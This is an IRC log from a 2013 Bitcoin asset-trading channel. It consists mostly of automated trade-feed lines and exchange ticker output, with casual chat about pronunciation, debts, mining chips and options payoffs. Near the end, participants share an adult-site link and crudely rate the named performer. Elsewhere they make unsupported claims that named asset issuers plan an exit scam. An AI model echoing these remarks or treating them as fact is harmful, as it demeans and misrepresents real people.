[S.MPOE] 8275 @ 0.00083043 = 6.8718 BTC [-] Jun 28 19:15:43 [BTCTC] [DMS.PURCHASE] 18 @ 0.053583 = 0.9645 BTC [-] Jun 28 19:16:50 [BTCTC] [DMS.PURCHASE] 70 @ 0.053583 = 3.7508 BTC [-] Jun 28 19:17:28 [BTCTC] [DMS.PURCHASE] 2 @ 0.053583 = 0.1072 BTC [-] Jun 28 19:17:35 [BTCTC] [ASICMINER-PT] 3 @ 3.439978 = 10.3199 BTC [+] Jun 28 19:21:39 when you see MPEX, do you read it em-pex (2 sylables), em-pee-ex (3 sylables), or em-pee-ee-ex (4 sylables)? Jun 28 19:22:06 [BTCTC] [DMS.MINING] 2 @ 0.02299 = 0.046 BTC [-] Jun 28 19:22:08 [BTCTC] [DMS.MINING] 16 @ 0.0224 = 0.3584 BTC [-] Jun 28 19:22:14 the first Jun 28 19:22:33 peterl: when I see it, I look away, quickly. To avoid going blind at the sight of greatness Jun 28 19:22:48 aknap3 lol Jun 28 19:22:57 em-pee-a-ex. but I'm French Jun 28 19:23:12 -a-ex? Jun 28 19:23:16 wheres the A from Jun 28 19:23:22 france Jun 28 19:23:27 the french way of pronouncing e? Jun 28 19:24:01 empex Jun 28 19:24:03 ugly. Jun 28 19:24:05 cmon now Jun 28 19:25:22 [HAVELOCK] [KCIM] 1 @ 1.029 BTC [-] Jun 28 19:26:49 yeah, I read the letters half-correctly Jun 28 19:28:33 ThickAsThieves http://trilema.com/2013/preaching-to-the-choir-were-still-on-the-topic-of-citizen-financial-dentistry/ Jun 28 19:28:35 there you go. Jun 28 19:29:18 lol a is from frAnce Jun 28 19:29:57 your blog is annoying, I have to cheat to read it Jun 28 19:30:32 great and namworld have an exit strategy: they stop paying the daily dividend, the sahre price plummets as everybody screams scam, and they buy the shares up cheap Jun 28 19:30:49 [HAVELOCK] [ASICM] 7 @ 0.03345 = 0.2342 BTC [+] Jun 28 19:33:09 oh wow? Jun 28 19:33:56 umm, usagai, are you responding to something specific? Jun 28 19:34:37 cause you are an easy target? and you overreact comically? Jun 28 19:35:02 lol Jun 28 19:35:11 mp: you're a meanie Jun 28 19:35:24 norly ? Jun 28 19:35:43 peterl for the record that was the obsi strategy Jun 28 19:35:48 poor usagi -- when someone's injured that badly, you don't let them suffer -- you put them out of their misery Jun 28 19:35:53 we've not so far seen either graet or nam implement this. Jun 28 19:37:16 [BTCTC] [AMC-PT] 9 @ 0.002439 = 0.022 BTC [-] Jun 28 19:39:02 [BTCTC] [DMS.SELLING] 1 @ 0.031 BTC [-] Jun 28 19:40:35 usagi: if you post your claims on btctalk then anyone can read them whenever they want. If you post them here, you'll have a need to repeat them endlessly and you'll only earn disdain from everyone who has to filter you out of the channel Jun 28 19:45:28 sounds reasonable, but I don't know the story, nor do I want to. if that's all you want, then let your debtors know and then withdraw. if they want payment they know where to find you, no? Jun 28 19:46:15 i have seen a good-faith effort on your part to pay people back. can't fault for you for that, of course I rarely fault people for anything. Jun 28 19:46:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.033699 = 0.1348 BTC [-] Jun 28 19:46:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.0336 = 0.672 BTC [-] Jun 28 19:46:49 good luck usagi, sounds like the climb back to credibility is a long one in the bitcoin world. Jun 28 19:47:09 climb back to credibility ? Jun 28 19:47:25 not something that's possible today. many people would love it be possible, but we ain't there yet. Jun 28 19:48:04 [BTCTC] [ASICMINER-PT] 1 @ 3.400007 BTC [-] Jun 28 19:48:18 has anyone scrambled back after something like this? I don't really see evidence of it... Jun 28 19:49:31 I've been paying a small amount, but then bitcoins went up 10x which makes it hard to pay people back Jun 28 19:50:23 "but i don't know the story, nor do I want to." Jun 28 19:50:31 because everyone has a story. Jun 28 19:52:04 no, there does not exist such an example to date. Jun 28 19:52:56 well, at least he's trying! I could see myself getting hosed in a similar manner, but I trust too much. Jun 28 19:54:21 this at least he's tryiong thing... Jun 28 19:54:30 here's the thing : people go with a head full of steam and tell mpoe-pr what's what Jun 28 19:54:36 then they're at least trying, a year later. Jun 28 19:54:45 well da fuck, at least try before cutting rather than after. Jun 28 19:55:09 maybe he was trying, but trusted poorly. Jun 28 19:55:18 [BTCTC] [BASIC-MINING] 10 @ 0.199899 = 1.999 BTC [-] Jun 28 19:55:20 [BTCTC] [BASIC-MINING] 23 @ 0.1999 = 4.5977 BTC [+] Jun 28 19:55:22 [BTCTC] [BASIC-MINING] 10 @ 0.19998 = 1.9998 BTC [+] Jun 28 19:55:23 [BTCTC] [BASIC-MINING] 82 @ 0.2 = 16.4 BTC [+] Jun 28 19:56:36 usagi, were you trying Jun 28 19:56:37 ? Jun 28 19:56:51 ;) jokes! Jun 28 19:58:04 [BTCTC] [BASIC-MINING] 5 @ 0.2 = 1 BTC [+] Jun 28 19:58:33 yes, but he's a hash dealer in Leander, Texas. Jun 28 19:58:36 probably not the same guy. Jun 28 20:00:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.034187 = 0.1367 BTC [+] Jun 28 20:03:32 [BTCTC] [BASIC-MINING] 5 @ 0.2 = 1 BTC [+] Jun 28 20:04:51 [BTCTC] [BASIC-MINING] 1 @ 0.2 BTC [+] Jun 28 20:06:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.034187 = 0.1367 BTC [+] Jun 28 20:10:49 [BTCTC] [DMS.MINING] 3 @ 0.023 = 0.069 BTC [+] Jun 28 20:11:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.033501 = 0.134 BTC [-] Jun 28 20:11:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.0334 = 0.1336 BTC [-] Jun 28 20:14:01 [MPEX] [S.MPOE] 2407 @ 0.00083193 = 2.0025 BTC [+] Jun 28 20:14:02 [BTCTC] [BASIC-MINING] 2 @ 0.2 = 0.4 BTC [+] Jun 28 20:14:14 [MPEX] [S.MPOE] 2093 @ 0.00083201 = 1.7414 BTC [+] Jun 28 20:15:39 [BTCTC] [TAT.ASICMINER] 125 @ 0.034 = 4.25 BTC [+] Jun 28 20:16:30 [BTCTC] [TAT.ASICMINER] 112 @ 0.034 = 3.808 BTC [+] Jun 28 20:16:34 [BTCTC] [DMS.MINING] 10 @ 0.023283 = 0.2328 BTC [+] Jun 28 20:18:20 [BTCTC] [ASICMINER-PT] 1 @ 3.400013 BTC [+] Jun 28 20:21:06 [BTCTC] [AMC-PT] 30 @ 0.002402 = 0.0721 BTC [-] Jun 28 20:23:08 [BTCTC] [BMF] 1 @ 0.036 BTC [+] Jun 28 20:24:34 [BTCTC] [ASICMINER-PT] 1 @ 3.400013 BTC [+] Jun 28 20:26:15 [MPEX] [S.MPOE] 10069 @ 0.00083201 = 8.3775 BTC [+] Jun 28 20:29:00 are we headed to $40 btc? i hope so. Jun 28 20:30:33 [BTCTC] [DMS.MINING] 11 @ 0.023283 = 0.2561 BTC [+] Jun 28 20:31:12 ;;ticker Jun 28 20:31:12 MtGox BTCUSD ticker | Best bid: 96.21003, Best ask: 96.89491, Bid-ask spread: 0.68488, Last trade: 96.92399, 24 hour volume: 39561.06229165, 24 hour low: 95.65000, 24 hour high: 102.92000, 24 hour vwap: 98.60921 Jun 28 20:32:13 [BTCTC] [DMS.MINING] 10 @ 0.022501 = 0.225 BTC [-] Jun 28 20:32:15 [BTCTC] [DMS.MINING] 20 @ 0.0225 = 0.45 BTC [-] Jun 28 20:32:16 [BTCTC] [DMS.MINING] 2 @ 0.0224 = 0.0448 BTC [-] Jun 28 20:32:18 [BTCTC] [DMS.MINING] 17 @ 0.0223 = 0.3791 BTC [-] Jun 28 20:32:19 [BTCTC] [DMS.MINING] 36 @ 0.022001 = 0.792 BTC [-] Jun 28 20:32:42 [BTCTC] [DMS.SELLING] 86 @ 0.0315 = 2.709 BTC [+] Jun 28 20:33:23 [BTCTC] [TAT.ASICMINER] 14 @ 0.034199 = 0.4788 BTC [+] Jun 28 20:33:41 [BTCTC] [DMS.MINING] 43 @ 0.022 = 0.946 BTC [-] Jun 28 20:34:01 [BTCTC] [BASIC-MINING] 5 @ 0.2 = 1 BTC [+] Jun 28 20:34:09 [HAVELOCK] [ASICM] 2 @ 0.0333 = 0.0666 BTC [-] Jun 28 20:34:21 [BTCTC] [BASIC-MINING] 10 @ 0.205 = 2.05 BTC [+] Jun 28 20:35:17 [BTCTC] [DMS.PURCHASE] 108 @ 0.053583 = 5.787 BTC [-] Jun 28 20:36:05 [BTCTC] [BTC-BOND] 1140 @ 0.009999 = 11.3989 BTC [+] Jun 28 20:37:05 [BTCTC] [TAT.ASICMINER] 6 @ 0.034199 = 0.2052 BTC [+] Jun 28 20:37:30 [HAVELOCK] [HIM] 20 @ 0.305001 = 6.1 BTC [+] Jun 28 20:39:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.0342 = 0.0684 BTC [+] Jun 28 20:40:34 [BTCTC] [DMS.PURCHASE] 1 @ 0.053583 BTC [-] Jun 28 20:40:40 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jun 28 20:41:32 [BTCTC] [TAT.ASICMINER] 20 @ 0.03428 = 0.6856 BTC [+] Jun 28 20:41:57 [BTCTC] [BASIC-MINING] 3 @ 0.207 = 0.621 BTC [+] Jun 28 20:41:59 [BTCTC] [ASICMINER-PT] 2 @ 3.425 = 6.85 BTC [+] Jun 28 20:43:00 [BTCTC] [COGNITIVE] 2 @ 0.543884 = 1.0878 BTC [+] Jun 28 20:44:15 [BTCTC] [S.DICE-PT] 100 @ 0.002169 = 0.2169 BTC [+] Jun 28 20:45:39 [BTCTC] [COGNITIVE] 1 @ 0.543887 BTC [+] Jun 28 20:45:52 [BTCTC] [BASIC-MINING] 1 @ 0.207879 BTC [+] Jun 28 20:46:16 [BTCTC] [BASIC-MINING] 4 @ 0.207879 = 0.8315 BTC [+] Jun 28 20:52:40 [BTCTC] [AMC-PT] 45 @ 0.002227 = 0.1002 BTC [-] Jun 28 20:53:28 [BTCTC] [TAT.ASICMINER] 8 @ 0.034 = 0.272 BTC [-] Jun 28 20:54:21 [BTCTC] [BITVPS] 6 @ 0.001141 = 0.0068 BTC [+] Jun 28 20:54:29 [BTCTC] [TAT.ASICMINER] 14 @ 0.034 = 0.476 BTC [-] Jun 28 20:55:09 louong are you like that one sane guy from btctalk ? Jun 28 20:55:25 sane? I don't think so Jun 28 20:56:11 a ok then Jun 28 20:57:17 [BTCTC] [ASICMINER-PT] 1 @ 3.446 BTC [+] Jun 28 20:58:10 [BTCTC] [ASICMINER-PT] 1 @ 3.446 BTC [+] Jun 28 20:58:30 I think everyone is insane to some degree Jun 28 20:58:33 that's all Jun 28 20:58:48 [BTCTC] [TAT.ASICMINER] 25 @ 0.034285 = 0.8571 BTC [+] Jun 28 21:01:43 [BTCTC] [COGNITIVE] 6 @ 0.543884 = 3.2633 BTC [-] Jun 28 21:03:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.034285 BTC [+] Jun 28 21:04:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.034285 BTC [+] Jun 28 21:04:33 [BTCTC] [TAT.ASICMINER] 35 @ 0.034 = 1.19 BTC [-] Jun 28 21:07:38 [BTCTC] [TAT.ASICMINER] 100 @ 0.03 = 3 BTC [-] Jun 28 21:07:49 [BTCTC] [TAT.ASICMINER] 16 @ 0.034284 = 0.5485 BTC [+] Jun 28 21:07:57 [BTCTC] [TAT.ASICMINER] 75 @ 0.03 = 2.25 BTC [-] Jun 28 21:08:13 blah, need to wait monday for fury chips Jun 28 21:08:46 stuck in the post office. Jun 28 21:10:56 kakobrekla: What kind of specs does the Bitfury chips boast? Jun 28 21:11:16 [BTCTC] [BMF] 1 @ 0.03875 BTC [+] Jun 28 21:11:23 dunno from the top of my head its on the forums Jun 28 21:11:43 testing is happening as we speak Jun 28 21:11:51 final performance is not yet known i guess Jun 28 21:12:01 but they can do more than gh/w Jun 28 21:12:13 [BTCTC] [TAT.ASICMINER] 40 @ 0.033411 = 1.3364 BTC [+] Jun 28 21:12:16 depends on the clock and voltage ofc Jun 28 21:13:03 ill prolly burn a few Jun 28 21:13:05 [BTCTC] [COGNITIVE] 2 @ 0.543884 = 1.0878 BTC [-] Jun 28 21:13:15 [BTCTC] [AMC-PT] 100 @ 0.002227 = 0.2227 BTC [-] Jun 28 21:13:53 [BTCTC] [DMS.MINING] 2 @ 0.023329 = 0.0467 BTC [+] Jun 28 21:14:01 so in the end they got delayed by two weeks ? Jun 28 21:14:30 he had the chip working like 24hrs or so after the bet closed Jun 28 21:14:36 give or take Jun 28 21:14:47 just wasnt such a rush afterwards Jun 28 21:15:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005 BTC [+] Jun 28 21:15:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199 BTC [-] Jun 28 21:15:34 [BTCTC] [COGNITIVE] 1 @ 0.543884 BTC [-] Jun 28 21:15:45 i was ready to fly my ass overthere to kiev Jun 28 21:16:09 but eh Jun 28 21:16:10 [BTCTC] [RSM] 1 @ 0.019 BTC [-] Jun 28 21:16:40 [BTCTC] [GSDPT] 1 @ 0.002117 BTC [-] Jun 28 21:17:45 [BTCTC] [AMC-PT] 200 @ 0.002376 = 0.4752 BTC [+] Jun 28 21:20:27 [BTCTC] [AMC-PT] 1 @ 0.0023 BTC [-] Jun 28 21:21:24 [BTCTC] [S.MPOE-PT] 1 @ 0.000994 BTC [+] Jun 28 21:21:30 yeah Jun 28 21:21:46 i derive a rule from that adventure Jun 28 21:21:55 always add two weeks to your term, even if you already did so. Jun 28 21:22:05 [BTCTC] [S.MPOE-PT] 2 @ 0.000994 = 0.002 BTC [+] Jun 28 21:22:07 [BTCTC] [S.MPOE-PT] 6 @ 0.000994 = 0.006 BTC [+] Jun 28 21:22:41 [BTCTC] [S.MPOE-PT] 1 @ 0.000994 BTC [+] Jun 28 21:22:53 [BTCTC] [ASICMINER-PT] 10 @ 3.425 = 34.25 BTC [-] Jun 28 21:23:01 ad infinitum Jun 28 21:23:17 [BTCTC] [S.MPOE-PT] 1 @ 0.000994 BTC [+] Jun 28 21:23:37 [BTCTC] [S.MPOE-PT] 8 @ 0.000994 = 0.008 BTC [+] Jun 28 21:25:39 [BTCTC] [AMC-PT] 1 @ 0.002392 BTC [+] Jun 28 21:27:42 [MPEX] [S.MPOE] 3963 @ 0.0008316 = 3.2956 BTC [-] Jun 28 21:27:44 [MPEX] [S.MPOE] 5288 @ 0.00083201 = 4.3997 BTC [+] Jun 28 21:27:56 [MPEX] [S.MPOE] 3635 @ 0.0008321 = 3.0247 BTC [+] Jun 28 21:30:25 [BTCTC] [BTC-GOLD] 1 @ 0.009879 BTC [-] Jun 28 21:31:35 [BTCTC] [DMS.MINING] 2 @ 0.022016 = 0.044 BTC [-] Jun 28 21:32:26 [BTCTC] [BTC-GOLD] 5 @ 0.009879 = 0.0494 BTC [-] Jun 28 21:33:13 [BTCTC] [DMS.PURCHASE] 25 @ 0.053583 = 1.3396 BTC [-] Jun 28 21:35:01 [BTCTC] [DMS.MINING] 5 @ 0.022015 = 0.1101 BTC [-] Jun 28 21:35:12 [BTCTC] [COGNITIVE] 3 @ 0.543884 = 1.6317 BTC [-] Jun 28 21:35:34 [BTCTC] [RSM] 24 @ 0.019 = 0.456 BTC [-] Jun 28 21:35:36 [BTCTC] [RSM] 10 @ 0.0186 = 0.186 BTC [-] Jun 28 21:35:38 [BTCTC] [RSM] 7 @ 0.018504 = 0.1295 BTC [-] Jun 28 21:35:39 [BTCTC] [RSM] 10 @ 0.018503 = 0.185 BTC [-] Jun 28 21:35:41 [BTCTC] [RSM] 10 @ 0.018502 = 0.185 BTC [-] Jun 28 21:35:45 [BTCTC] [S.DICE-PT] 4900 @ 0.002169 = 10.6281 BTC [+] Jun 28 21:37:40 [BTCTC] [BTC-GOLD] 10 @ 0.009879 = 0.0988 BTC [-] Jun 28 21:39:20 [BTCTC] [TAT.ASICMINER] 40 @ 0.033997 = 1.3599 BTC [+] Jun 28 21:39:22 [BTCTC] [TAT.ASICMINER] 35 @ 0.033998 = 1.1899 BTC [+] Jun 28 21:39:23 [BTCTC] [TAT.ASICMINER] 95 @ 0.034 = 3.23 BTC [+] Jun 28 21:40:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.034 = 0.17 BTC [+] Jun 28 21:40:40 [BTCTC] [TAT.ASICMINER] 100 @ 0.0342 = 3.42 BTC [+] Jun 28 21:41:54 [BTCTC] [ASICMINER-PT] 1 @ 3.43999 BTC [+] Jun 28 21:41:56 [BTCTC] [ASICMINER-PT] 5 @ 3.44 = 17.2 BTC [+] Jun 28 21:42:01 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005477 = 0.011 BTC [+] Jun 28 21:42:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.034245 BTC [+] Jun 28 21:44:04 [BTCTC] [COGNITIVE] 1 @ 0.54395 BTC [+] Jun 28 21:44:19 [BTCTC] [TAT.ASICMINER] 200 @ 0.03 = 6 BTC [-] Jun 28 21:44:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.03423 = 0.1712 BTC [+] Jun 28 21:44:47 [BTCTC] [BTC-GOLD] 1 @ 0.009879 BTC [-] Jun 28 21:44:57 [BTCTC] [AMC-PT] 1 @ 0.002397 BTC [+] Jun 28 21:45:11 [BTCTC] [TAT.ASICMINER] 45 @ 0.0342 = 1.539 BTC [-] Jun 28 21:45:30 [BTCTC] [TAT.ASICMINER] 75 @ 0.03 = 2.25 BTC [-] Jun 28 21:48:05 [BTCTC] [DMS.SELLING] 5 @ 0.03232 = 0.1616 BTC [+] Jun 28 21:48:07 [BTCTC] [DMS.SELLING] 20 @ 0.032489 = 0.6498 BTC [+] Jun 28 21:49:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0342 BTC [+] Jun 28 21:50:22 [BTCTC] [BASIC-MINING] 2 @ 0.2091 = 0.4182 BTC [+] Jun 28 21:52:10 [MPEX] [S.MPOE] 3552 @ 0.00083043 = 2.9497 BTC [-] Jun 28 21:52:13 [MPEX] [S.MPOE] 1310 @ 0.00082927 = 1.0863 BTC [-] Jun 28 21:52:35 [HAVELOCK] [ASICM] 3 @ 0.033375 = 0.1001 BTC [+] Jun 28 21:53:13 [BTCTC] [ASICMINER-PT] 2 @ 3.3 = 6.6 BTC [-] Jun 28 21:55:00 [BTCTC] [ASICMINER-PT] 1 @ 3.4101 BTC [+] Jun 28 21:55:02 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [-] Jun 28 21:55:03 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [-] Jun 28 21:55:05 [BTCTC] [ASICMINER-PT] 5 @ 3.39 = 16.95 BTC [-] Jun 28 21:56:14 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jun 28 21:57:13 [BTCTC] [S.DICE-PT] 2 @ 0.002199 = 0.0044 BTC [+] Jun 28 21:58:14 [BTCTC] [AMC-PT] 45 @ 0.002384 = 0.1073 BTC [-] Jun 28 21:59:08 [BTCTC] [AMC-PT] 71 @ 0.0023 = 0.1633 BTC [-] Jun 28 21:59:42 [BTCTC] [BASIC-MINING] 10 @ 0.21 = 2.1 BTC [+] Jun 28 22:01:01 [BTCTC] [BASIC-MINING] 8 @ 0.211 = 1.688 BTC [+] Jun 28 22:01:50 [BTCTC] [ASICMINER-PT] 1 @ 3.438989 BTC [+] Jun 28 22:02:32 [BTCTC] [ASICMINER-PT] 1 @ 3.438988 BTC [-] Jun 28 22:03:03 [BTCTC] [S.DICE-PT] 1 @ 0.0022 BTC [+] Jun 28 22:03:43 [BTCTC] [S.DICE-PT] 330 @ 0.0023 = 0.759 BTC [+] Jun 28 22:03:45 [BTCTC] [TAT.ASICMINER] 20 @ 0.034199 = 0.684 BTC [-] Jun 28 22:03:47 [BTCTC] [TAT.ASICMINER] 54 @ 0.0342 = 1.8468 BTC [+] Jun 28 22:04:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.034229 BTC [+] Jun 28 22:09:31 does anyone know the function that would map out the return from selling a put or call? Jun 28 22:10:15 would it be premium - (x) with x being the amount you have to pay out Jun 28 22:13:27 premium - (strike price - exercise price) Jun 28 22:13:47 for puts. reverse the last too for calls. Jun 28 22:16:22 [BTCTC] [AMC-PT] 128 @ 0.0023 = 0.2944 BTC [-] Jun 28 22:16:24 [BTCTC] [AMC-PT] 4 @ 0.0023 = 0.0092 BTC [-] Jun 28 22:16:25 [BTCTC] [AMC-PT] 368 @ 0.002231 = 0.821 BTC [-] Jun 28 22:17:00 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005 BTC [-] Jun 28 22:17:38 [HAVELOCK] [ASICM] 15 @ 0.033 = 0.495 BTC [-] Jun 28 22:17:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.034229 = 0.1027 BTC [+] Jun 28 22:17:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.034229 = 0.3423 BTC [+] Jun 28 22:17:43 [BTCTC] [TAT.ASICMINER] 20 @ 0.03423 = 0.6846 BTC [+] Jun 28 22:21:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.033515 = 0.1676 BTC [-] Jun 28 22:23:00 [BTCTC] [TAT.ASICMINER] 11 @ 0.03423 = 0.3765 BTC [+] Jun 28 22:23:39 [BTCTC] [BTC-TRADING-PT] 2 @ 0.6846 = 1.3692 BTC [+] Jun 28 22:23:50 [BTCTC] [BASIC-MINING] 65 @ 0.197736 = 12.8528 BTC [-] Jun 28 22:23:54 [BTCTC] [AMC-PT] 11 @ 0.002255 = 0.0248 BTC [+] Jun 28 22:24:24 [MPEX] [S.MPOE] 8500 @ 0.00083168 = 7.0693 BTC [+] Jun 28 22:24:38 [MPEX] [S.MPOE] 3565 @ 0.0008321 = 2.9664 BTC [+] Jun 28 22:24:39 [BTCTC] [BASIC-MINING] 10 @ 0.197735 = 1.9774 BTC [-] Jun 28 22:24:40 [MPEX] [S.MPOE] 3135 @ 0.0008336 = 2.6133 BTC [+] Jun 28 22:25:17 [BTCTC] [BASIC-MINING] 10 @ 0.197648 = 1.9765 BTC [-] Jun 28 22:25:55 [BTCTC] [BASIC-MINING] 5 @ 0.197629 = 0.9881 BTC [-] Jun 28 22:27:10 [BTCTC] [ASICMINER-PT] 3 @ 3.429 = 10.287 BTC [-] Jun 28 22:28:32 [BTCTC] [TAT.ASICMINER] 6 @ 0.034229 = 0.2054 BTC [-] Jun 28 22:29:57 [BTCTC] [DMS.PURCHASE] 18 @ 0.053583 = 0.9645 BTC [-] Jun 28 22:30:20 [BTCTC] [S.DICE-PT] 1 @ 0.002295 BTC [-] Jun 28 22:30:22 [BTCTC] [S.DICE-PT] 4 @ 0.0023 = 0.0092 BTC [+] Jun 28 22:31:18 [MPEX] [S.MPOE] 7115 @ 0.0008336 = 5.9311 BTC [+] Jun 28 22:31:20 [MPEX] [S.MPOE] 9711 @ 0.00083532 = 8.1118 BTC [+] Jun 28 22:32:14 [BTCTC] [ASICMINER-PT] 1 @ 3.401001 BTC [-] Jun 28 22:32:52 hey -assets, i have dev-hours for sale. more than happy to accept btc. i do web apps, general sysadminnery and infrastructure automation; my partner does ios and architecture, and our understudies kinda do all the above. we will build stuff foar coins. Jun 28 22:32:53 [BTCTC] [ASICMINER-PT] 1 @ 3.401 BTC [-] Jun 28 22:34:40 benkay do you want to do an playing card game implementation ? Jun 28 22:34:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005 BTC [-] Jun 28 22:35:18 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.004899 = 0.147 BTC [-] Jun 28 22:35:35 pending scope and cost, sure Jun 28 22:42:35 o mircea doing a new project, .. i bet its some bitcoin poker or smth Jun 28 22:43:46 [BTCTC] [AMC-PT] 492 @ 0.002233 = 1.0986 BTC [-] Jun 28 22:43:48 [BTCTC] [AMC-PT] 41 @ 0.002232 = 0.0915 BTC [-] Jun 28 22:43:48 [BTCTC] [AMC-PT] 100 @ 0.002224 = 0.2224 BTC [-] Jun 28 22:43:50 [BTCTC] [AMC-PT] 5 @ 0.002221 = 0.0111 BTC [-] Jun 28 22:43:51 [BTCTC] [AMC-PT] 50 @ 0.00222 = 0.111 BTC [-] Jun 28 22:43:53 [BTCTC] [AMC-PT] 25 @ 0.00222 = 0.0555 BTC [-] Jun 28 22:43:55 [BTCTC] [AMC-PT] 690 @ 0.002211 = 1.5256 BTC [-] Jun 28 22:43:56 [BTCTC] [AMC-PT] 300 @ 0.00221 = 0.663 BTC [-] Jun 28 22:43:58 [BTCTC] [AMC-PT] 1500 @ 0.00221 = 3.315 BTC [-] Jun 28 22:43:59 [BTCTC] [AMC-PT] 10 @ 0.0022 = 0.022 BTC [-] Jun 28 22:44:00 [BTCTC] [AMC-PT] 550 @ 0.0021 = 1.155 BTC [-] Jun 28 22:44:02 [BTCTC] [AMC-PT] 1 @ 0.0021 BTC [-] Jun 28 22:48:15 [BTCTC] [ASICMINER-PT] 2 @ 3.391 = 6.782 BTC [-] Jun 28 22:48:48 lol poker. Jun 28 22:48:51 poker is for scammers. Jun 28 22:51:26 [BTCTC] [ASICMINER-PT] 3 @ 3.401 = 10.203 BTC [+] Jun 28 22:51:27 [BTCTC] [ASICMINER-PT] 2 @ 3.401001 = 6.802 BTC [+] Jun 28 22:53:54 [BTCTC] [AMC-PT] 50 @ 0.0021 = 0.105 BTC [-] Jun 28 22:55:18 ;;bs,stats Jun 28 22:55:18 Error: "bs,stats" is not a valid command. Jun 28 22:55:25 Should have worked, giving me 100% Jun 28 22:55:33 ;;bc,stats Jun 28 22:55:35 Current Blocks: 243817 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 118 blocks | Next Difficulty In About: 15 hours, 59 minutes, and 59 seconds | Next Difficulty Estimate: 21370577.6703 | Estimated Percent Change: 10.50361 Jun 28 22:56:36 [BTCTC] [DMS.SELLING] 3 @ 0.032497 = 0.0975 BTC [+] Jun 28 22:56:42 [HAVELOCK] [HIM] 5 @ 0.318999 = 1.595 BTC [+] Jun 28 22:57:39 [BTCTC] [DMS.MINING] 4 @ 0.023297 = 0.0932 BTC [+] Jun 28 22:59:08 Mining growth has dropped to half of what it was just two weeks ago. Jun 28 22:59:10 THIS IS THE END! SELL! SELL! SELL! Jun 28 23:03:57 http://girls.twistys.com/preview/totm/07-2013/p01/ Jun 28 23:04:01 Caprice Twistys treat of the month for July 2013 Jun 28 23:04:39 "I like the sex" Jun 28 23:06:04 cute face, but that's it. "started in the adult industry 4 years ago" so at least 22. Jun 28 23:06:11 2/10 would not bang Jun 28 23:06:39 [BTCTC] [AMC-PT] 10 @ 0.002225 = 0.0223 BTC [+] Jun 28 23:07:29 ;;ticker Jun 28 23:07:29 MtGox BTCUSD ticker | Best bid: 93.69178, Best ask: 93.88560, Bid-ask spread: 0.19382, Last trade: 93.88560, 24 hour volume: 50937.65778875, 24 hour low: 92.25000, 24 hour high: 102.92000, 24 hour vwap: 97.54917 **** BEGIN LOGGING AT Fri Jun 28 23:39:46 2013 Jun 28 23:40:12 they have before Jun 28 23:40:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 28 23:46:46 [HAVELOCK] [ASICM] 2 @ 0.03281 = 0.0656 BTC [-] Jun 28 23:47:43 furuknap: i saw that too, but it felt fake. Jun 28 23:48:12 it was some sub-blog of cnn. Jun 28 23:48:24 [MPEX] [S.MPOE] 6300 @ 0.00083295 = 5.2476 BTC [-] Jun 28 23:48:32 but the link in it just went to the snowden article that said nothing about btc-e. Jun 28 23:50:55 [BTCTC] [ASICMINER-PT] 3 @ 3.401 = 10.203 BTC [+] Jun 28 23:50:57 [BTCTC] [ASICMINER-PT] 2 @ 3.401 = 6.802 BTC [+] Jun 28 23:53:59 [BTCTC] [AMC-PT] 3 @ 0.002388 = 0.0072 BTC [+] Jun 28 23:54:41 [BTCTC] [ASICMINER-PT] 3 @ 3.401 = 10.203 BTC [+] Jun 28 23:58:08 [BTCTC] [DMS.SELLING] 1 @ 0.031101 BTC [-] Jun 28 23:58:10 [BTCTC] [DMS.SELLING] 1 @ 0.0311 BTC [-] Jun 28 23:58:11 [BTCTC] [DMS.SELLING] 28 @ 0.0311 = 0.8708 BTC [-] Jun 28 23:58:41 [BTCTC] [DMS.PURCHASE] 30 @ 0.053583 = 1.6075 BTC [-] Jun 29 00:00:22 [BTCTC] [AMC-PT] 600 @ 0.0021 = 1.26 BTC [-] Jun 29 00:01:23 so teh surda guy is butthurt. because that's the way, getting butthurt. Jun 29 00:01:32 [HAVELOCK] [HIM] 1 @ 0.3189911 BTC [-] Jun 29 00:01:47 [BTCTC] [DMS.MINING] 3 @ 0.023297 = 0.0699 BTC [-] Jun 29 00:02:23 [BTCTC] [DMS.SELLING] 2 @ 0.031101 = 0.0622 BTC [+] Jun 29 00:02:25 [BTCTC] [DMS.SELLING] 1 @ 0.0311 BTC [-] Jun 29 00:02:45 gotta stop bending over. Jun 29 00:02:57 [BTCTC] [DMS.PURCHASE] 3 @ 0.053583 = 0.1607 BTC [-] Jun 29 00:09:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.033601 = 1.6801 BTC [-] Jun 29 00:10:16 [BTCTC] [TAT.ASICMINER] 6 @ 0.032 = 0.192 BTC [-] Jun 29 00:11:20 http://online.wsj.com/article/SB10001424127887323689204578571872316756056.html Jun 29 00:11:25 Hog-Futures Market Is Red Hot - WSJ.com Jun 29 00:11:27 need bacon asset Jun 29 00:11:47 oh yeah paywall Jun 29 00:11:58 lol Jun 29 00:12:08 his derpness forgets Jun 29 00:12:39 [HAVELOCK] [ASICM] 100 @ 0.03281 = 3.281 BTC [-] Jun 29 00:17:42 [HAVELOCK] [HIM] 1 @ 0.3189921 